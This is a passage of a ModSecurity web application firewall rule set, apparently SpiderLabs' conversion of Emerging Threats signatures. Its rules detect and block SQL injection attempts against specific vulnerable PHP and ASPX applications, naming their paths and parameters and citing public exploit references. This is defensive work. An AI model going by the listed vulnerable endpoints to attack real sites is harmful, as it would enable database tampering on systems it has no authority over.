UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE SecRule REQUEST_LINE "@contains /compare_product.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005822,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3083'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Shop SQL Injection Attempt -- compare_product.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005828) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE SecRule REQUEST_LINE "@contains /user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005828,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3082'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iGeneric iG Calendar SQL Injection Attempt -- user.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006614) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE SecRule &TX:'/SQL_INJECTION.*ARGS:D/' "@gt 0" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006614,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21467',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iWare Professional SQL Injection Attempt -- index.php D UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE SecRule REQUEST_LINE "@contains /install.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004845,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459796/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:bgcolor/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS mcRefer SQL Injection Attempt -- install.php bgcolor UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004469,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004473,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004479,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24249'" SecRule &TX:'/SQL_INJECTION.*ARGS:year/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie SQL Injection Attempt -- index.php year UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE SecRule REQUEST_LINE "@contains /read/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004010,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3964'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ol bookmarks SQL Injection Attempt -- index.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010619) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /modules/bms/invoices_discount_ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010619,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBMS invoices_discount_ajax.php id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid UPDATE SecRule REQUEST_LINE "@contains /nickpage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004904,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3299'" SecRule &TX:'/SQL_INJECTION.*ARGS:npid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCC SQL Injection Attempt -- nickpage.php npid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004175) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004175,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:image_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php image_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004181,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- gallery.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004187) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004187,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004193) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004193,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- print.php news_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004199) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_cat_id UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004199,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:news_cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- news.php news_cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004205) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004205,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004211) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004211,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php topic_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004217) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE SecRule REQUEST_LINE "@contains /forums.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004217,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- forums.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004223) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE SecRule REQUEST_LINE "@contains /users.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004223,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23033'" SecRule &TX:'/SQL_INJECTION.*ARGS:user_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpx SQL Injection Attempt -- users.php user_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003787) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- index.php cid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003787,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3813'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS pnFlashGames SQL Injection Attempt -- index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE SecRule REQUEST_LINE "@contains /wbsearch.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005668,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3106'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS uniForum SQL Injection Attempt -- wbsearch.aspx UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE SecRule REQUEST_LINE "@contains /vBSupport.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005353,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE',tag:'web-application-attack',tag:'url,www.vbulletin.org/forum/showthread.php?t=94023&page=38'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vBSupport SQL Injection Attempt -- vBSupport.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005359) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE SecRule REQUEST_LINE "@contains /vBSupport.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005359,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24397'" SecRule &TX:'/SQL_INJECTION.*ARGS:ticketid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS vSupport Integrated Ticket System SQL Injection Attempt -- vBSupport.php ticketid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004753) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE SecRule REQUEST_LINE "@contains /printview.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004753,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3351'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- printview.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004886) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004886,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3325'" SecRule &TX:'/SQL_INJECTION.*ARGS:showonly/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- index.php showonly UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005244) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005244,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3172'" SecRule &TX:'/SQL_INJECTION.*ARGS:picID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php picID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005250) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005250,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0270'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005255) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE SecRule REQUEST_LINE "@contains /gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005255,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0270'" SecRule &TX:'/SQL_INJECTION.*ARGS:galleryID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webSPELL SQL Injection Attempt -- gallery.php galleryID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE SecRule REQUEST_LINE "@contains /xNews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005163,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3216'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS xNews SQL Injection Attempt -- xNews.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011559,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_zoomportfolio" "chain" SecRule REQUEST_LINE "@contains view=portfolio" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_zoomportfolio component UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011382) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /refund_request.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011382,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,41377'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:orderid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iScripts MultiCart orderid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011450) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /classified_img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011450,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,41204'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:clsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS V-EVA Classified Script clsid Parameter UPDATE SET SQL Injection 